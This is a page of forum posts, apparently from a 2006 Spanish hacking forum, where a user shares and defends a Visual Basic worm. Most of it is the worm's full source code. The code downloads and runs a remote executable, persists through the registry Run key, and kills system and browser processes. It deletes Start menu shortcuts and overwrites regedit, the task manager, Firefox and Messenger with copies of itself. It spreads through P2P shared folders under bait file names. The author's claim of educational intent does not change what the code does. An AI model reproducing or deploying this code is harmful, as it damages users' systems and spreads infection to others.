|
Mostrar Mensajes
|
Páginas: 1 2 [3] 4 5 6 7 8
|
21
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 30 Diciembre 2006, 06:34 am
|
El punto de este malware es "Que se de cuenta que esta infectado", pues claro que mostrando MSGBOX con ese tipo de mensajes cualquier persona se sorprenderia y se asustaria, y empezara a correr los miles de antivirus que tiene, pero ninguno usa con eficazia... Veras que no es nisiquiera un buen worm, es solo una burrada que se me ocurrio y ya... El archivo AUTOEXEC (Por lo menos en mi XP) si sale... .
|
|
|
22
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 30 Diciembre 2006, 05:18 am
|
los troyanos, virus, worms, spyware, malware, dialers todos esos un usuario experto en PC y que esta en el tema es dificil que se le meta a la PC algo de esto, pero los otros que son unos NW solo usuarios que no saben una ***** o tiene un minimo conocimiento como mi vieja son los que sufren las consecuencias...! si no entendes mi punto de vista te doy otra explicacion. Claro xDDD... Tampoco pienso que un experto en el tema caiga en un worm tan sencillo... Es solo para los Newbies, como dije anteriormente, es de fines educativos, pero un worm mas fuerte usaria mejores redes para propagarse... .
|
|
|
23
|
Programación / Programación Visual Basic / Re: Worm By: DrakoX
|
en: 30 Diciembre 2006, 05:14 am
|
Esta muy bueno tu worm...
pero... aunque es muy tentativo, yo me limitaria a infectar por msn, ya que se esta volviendo muy "Comun" y los antivirus estan a la guardia con eso...
Esta muy bueno tu worm, un poco destructivo si... xDDD
|
|
|
24
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 30 Diciembre 2006, 05:07 am
|
Me encantaria insultarte! otro mas que crea un virus para romper la makina de alguien [...] que ganas...? ensima mira todo lo que posteas, no sabes que la mayoria de la gente no lee todo xq le parece agobiante, ponlo de a poco y explicado si lo vas a hacer. Salu2 y espero que no te sirva En realidad fue hecho con fines educativos y no pretendo joder a nadie, si analizas bien el worm lo unico que hace es copiarse en mil directorios y matar algunos procesos, no hace mas nada, no borra informacion util, no desconfigura la maquina ni nada... (Depnde como uses el AUTOEXEC xDDD!) Yo considero esto mas un Joke que un worm... pero en fin... son terminos y para mi worm es algo mas destructivo.. , este tan solo es el inicio de un worm... tan solo cumple funciones basicas... pero no llega al extremo de destruir una maquina...
|
|
|
25
|
Programación / Programación Visual Basic / Subir archivos...
|
en: 30 Diciembre 2006, 05:03 am
|
Buenas... Estoy creando un programa para subir archivos a una web en especifica... He preguntando mediante ftp pero no me dan una buena respuesta y la respuesta que me dieron no era "Cierta" ... -.- Si me pudieran ayudar, seria muy bueno .
|
|
|
29
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 29 Diciembre 2006, 02:05 am
|
- Oriente eterno- Option Explicit Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" _ (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ 'API's para descargar sin ser detectado ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Dim ERROR_SUCCESS Private Sub Alumbra() On Error Resume Next
Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/DCOM/InetCat.exe" DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\InetCat.exe"
'Descarga el Inetcat, exactamente el InetCat es el NayrocBits, solo que le cambie el nombre :P
End Sub Private Sub Orientame() On Error Resume Next Dim RegistroCochino As Object Dim RutaCochina As String Dim CadenaNueva As String Dim ContenidoCadena As String ContenidoCadena = App.Path & "\" & App.EXEName & ".Exe" CadenaNueva = "\SystemTray" RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _ "\CurrentVersion\Run" & CadenaNueva Set RegistroCochino = CreateObject("WScript.Shell") RegistroCochino.RegWrite RutaCochina, ContenidoCadena 'Aqui me añado al registro. End Sub
Private Function NumeroAleartorio(Entre As Integer, yEntre As Integer) As Integer On Error Resume Next Randomize NumeroAleartorio = Int((Entre - yEntre + 1) * Rnd + yEntre) End Function 'Funcion para generar numeros aleatorios
Private Sub EliminarInicio() Do On Error Resume Next Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\" & "*.*" Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\" & "*.*" Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\Herramientas del sistema\" & "*.*"
'Aqui elimino los accesos directos
End Sub
Private Sub OccidenteIntolerante() On Error Resume Next Dim sel sel = Int(Rnd() * 7) Select Case sel
'Aqui mezcle el radom y el case, lo que sucede es que se "Ejecuta cierto codigo de manera aleatoria". 'Aclaro que donde dice "Label1" es donde van los numeros aleatorios. :P
Case 0 MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation Matar ("Explorer.exe")
Case 1 MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation Matar ("Explorer.exe")
Case 2 MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation Matar ("Explorer.exe") Case 3 Matar ("explorer.exe") Matar ("iexplore.exe") Matar ("msnmsgr.exe") Matar ("firefox.exe") Matar ("opera.exe") Matar ("taskmgr.exe") Matar ("regedit.exe") Case 4 Shell Environ("SYSTEMROOT") & "\InetCat.exe" MsgBox " ", vbCritical
Case 5 SecuestroCarpeta Environ("SYSTEMDRIVE") & "\RECYCLER\SECUESTRO\" Matar ("services.msc") Matar ("taskmgr.exe") Matar ("regedit.exe") FileCopy Environ("sys32") & "\services.msc", Environ("systemdrive") & "\RECYCLER\Secuestro\services.msc" FileCopy Environ("sys32") & "\regedit.exe", Environ("systemdrive") & "\RECYCLER\Secuestro\regedit.exe" FileCopy Environ("sys32") & "\taskmgr.exe", Environ("systemdrive") & "\RECYCLCER\SECUESTRO\taskmgr.exe" Kill Environ("SYS32") & "\services.msc" Kill Environ("sys32") & "\regedit.exe" Kill Environ("sys32") & "\taskmgr.exe" FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\regedit.exe" FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\taskmgr.exe" FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\services.msc" MsgBox " ", vbCritical
'Aqui me suplemento con los archivos importantes.
Case 6 do msgbox " ", vbCritical, " " loop
End Select End Sub Private Sub InfectarP2P()
On Error GoTo NOHAYP2P: Do
'Aqui me añado a un archivo RAR y me copio a distintos directorios P2P, para expandirme... Esta idea la saque de una guia por Hendrix, muy buena idea ;).
Shell Environ("programfiles") & "\WINRAR\WinRAR.exe" & " a """ & Environ("Systemdrive") & "\K.rar"" """ & App.Path & "\" & App.EXEName & ".exe" & """", vbHide
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Removal Tools.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-Sasser.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Mis documentos.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Removal Tools.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Mis documentos.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Overnet\incoming\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Swaptor\Download\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\WinMX\My Shared Folder\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Tesla\Files\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\XoloX\Downloads\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Rapigator\Share\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\KMD\My Shared Folder\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\BearShare\Shared\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Direct Connect\Received Files\Gedzac.rar" 'Infectar mediante canales P2P NOHAYP2P: End Sub
Public Sub SecuestroCarpeta(DirPath As String) On Error GoTo error MkDir DirPath$ Exit Sub error: 'Crear carpetas de secuestro End Sub Sub Copiar() Do SecuestroCarpeta Environ("temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80" FileCopy App.EXEName + ".exe", Environ("Temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80\VGA.exe" SecuestroCarpeta Environ("tmp") & "\U\S\" FileCopy App.EXEName + ".exe", Environ("tmp") & "\U\S\IECACHE.exe" SecuestroCarpeta Environ("SYSTEMDRIVE") & "\Kw\" FileCopy App.EXEName + ".exe", Environ("systemdrive") & "\Kw\Dir.exe" SecuestroCarpeta Environ("SYS32") & "\Oriente-Eterno\" FileCopy App.EXEName + ".exe", Environ("SYS32") & "\Oriente-Eterno\Desinfectar.exe"
End Sub Sub Hijastros() 'Aqui hago lo mismo que secuestrar, pero esta vez lo hago con 'programas importantes. Matar ("msnmsgr.exe") Kill Environ("Programfiles") & "\MSN Messenger\msnmsgr.exe" FileCopy App.EXEName + ".exe", Environ("programfiles") & "\MSN Messenger\msnmsgr.exe"
Matar ("firefox.exe") Kill Environ("Programfiles") & "\Mozilla firefox\firefox.exe" FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Mozilla firefox\firefox.exe"
Matar ("ypager.exe") Kill Environ("Programfiles") & "\Yahoo!\Messenger\ypager.exe" FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Yahoo!\Messenger\ypager.exe"
Matar ("Realplay.exe") Kill Environ("Programfiles") & "\real\relaplayer\realplay.exe" FileCopy App.EXEName + ".exe", Environ("Programfiles") & "\real\relaplayer\realplay.exe"
Matar ("wmplayer") Kill Environ("Programfiles") & "\Windows media player\wmplayer.exe" FileCopy App.EXEName + ".exe", Environ("ProgrAmFiLeS") & "\Windows media player\Wmplayer.exe" 'No infectar el mplayer2 ni otro archivo, ya que seria fatal para el SO 'y ese no es el punto de este virus
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean DownloadFile = URLDownloadToFile(0, sURL, _ sLocalFile, 0, 0) = ERROR_SUCCESS End Function
Private Sub form_load() On Error Resume Next App.TaskVisible = False Label1.Caption = NumeroAleartorio(0, 100)
Alumbra OccidenteIntolerante Orientame InfectarP2P OrienteEterno EscribirHTA EliminarInicio Copiar Hijastros
Shell Environ("SYSTEMroot") & "\Index.hta"
'hdp End Sub Private Sub EscribirHTA() Do Open Environ("systemROOT") & "\Index.hta" For Output As #1 Print #1, "<HTML>" Print #1, "<HEAD>" Print #1, "<TITLE>Oriente Eterno</TITLE>" Print #1, "</HEAD>" Print #1, "<CENTER> En honor a las Almas caidas </CENTER>" Print #1, "<CENTER> En honor a los ignorados y resentidos </center> " Print #1, "<CENTER> En honor al pueblo Libanes </center> " Print #1, "<CENTER> En honor a los muertos del 11 de Abril - Venezuela </center> " Close #1
End Sub
Public Sub Matar(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices servicename = LCase(Trim(CStr(oService.Name) & "")) If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If Next Set oServices = Nothing Set oWMI = Nothing 'Matar procesos ErrHandler: Err.Clear End Sub Private Sub OrienteEterno() On Error Resume Next
Dim SantoOriente SantoOriente = Int(Rnd() * 11) Select Case SantoOriente Case 0 MsgBox "Dios bendiga las almas del pulgatorio", , "Amen" Case 1 MsgBox "¿Hasta cuando es hora que el Occidente Intolerante ignore la existencia de Dios y del mundo Espiritual y Abandone los placeres materiales?", , "Oriente Eterno" Case 2 MsgBox "Mientras tengamos el estamago lleno, no pensamos en los que tienen el estomago vacio", , "FOOD-FOR-LIFE" Case 3 MsgBox "Que el prayamama este con vosotros, benditos sean", , "Prayamama" Case 4 MsgBox "Es facil matar, Es dificil perderlo", , "No mates" Case 5 MsgBox "Ohh buen cristiano, Cristiano del alma, ¿Cuantos mandamientos ignorastes hoy?", , "Dios nos mira atentamente" Case 6 MsgBox "No es religiosidad la causa de nuestra existencia, Es el profundo amor que nos tiene Dios, y muchas veces lo ignoramos", , "Alto al suicidio" Case 7 MsgBox "Por las almas benditas de los inocentes libaneses, Que descansen en paz en el Oriente Eterno", , "Oriente Eterno" Case 8 MsgBox "Por la justicia en Venezuela, No olvidaremos el 11 de Abril", , "Justicia!" Case 9 MsgBox "Por ser negro o por tener un distinto credo, no quita que seamos obra e hijos del Dios ", , "No al racismo" Case 10 MsgBox "Es hora de la reflexion", , "Reflexiona" End Select
End Sub
Este codigo lo hago en nombre de todos los muertos y caidos, resentidos e ignorados... Hasta luego y espero que lo usen con fines beneficos .
|
|
|
30
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 29 Diciembre 2006, 01:06 am
|
Lo que hace es autocopiarse y suplementar otros archivos. por ejemplo, este suplementa el "Regedit", el "Taskmgr (Administrador de tareas) y el "Services.msc". Cuando presionen el "CTRL+ALT+SPR" mi worm se ejecutara (Eso tengo previsto ), tambien se añade al AUTOEXEC para iniciarse con el sistema sin necesidad de añadirme al registro. Lo que hace es multiplicarse y multiplicarse, tambien descarga la otra version un poco mas violenta llamada "Oriente-eterno" (Lo descarga y tambien lo ejecuta mediante el mismo procedimiento). Tambien cambia el titulo del IE y la pagina principal. Lo explicare mejor: Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" _ (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ 'Estas son apis para descargar archivos sin ser detectados ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS Private Sub Clipb() On Error GoTo clip Do Clipboard.Clear Clipboard.SetText " K-32 - Prayamama" 'Este se mantiene en el clipboard mediante el DO, cuando den al "CTRL+V" Se copiara eso automaticamente :p Loop clip: End Sub Private Sub NayrocSTAM() Do On Error GoTo NoSTAM PagInicia ("http://www.elhacker.net") ' Este cambia la pagina de inicio TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)") 'Este cambia el titulo del IE, en vez de decir "Microsoft Internet Explorer" dice ese titulo :P MsgBox " " & vbCrLf & " ", vbCritical Loop
NoSTAM:
End Sub
Private Function Secuestro(UpPath As String, DownPath As String)'Funcion para mover archivos On Error GoTo seNO FileCopy UpPath$, DownPath$ Kill UpPath$ seNO: End Function Public Sub SecuestroCarpeta(DirPath As String) On Error GoTo error MkDir DirPath$ Exit Sub error: 'Crear carpetas de secuestro End Sub
Private Sub AeroBits() On Error GoTo seNO: Do 'Matar procesos antes de copiar Matar ("Taskmgr.exe") Matar ("Regedit.exe") Matar ("Services.msc") Matar ("cmd.exe") Matar ("Explorer.exe") Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\" 'Creamos carpetas de secuestro
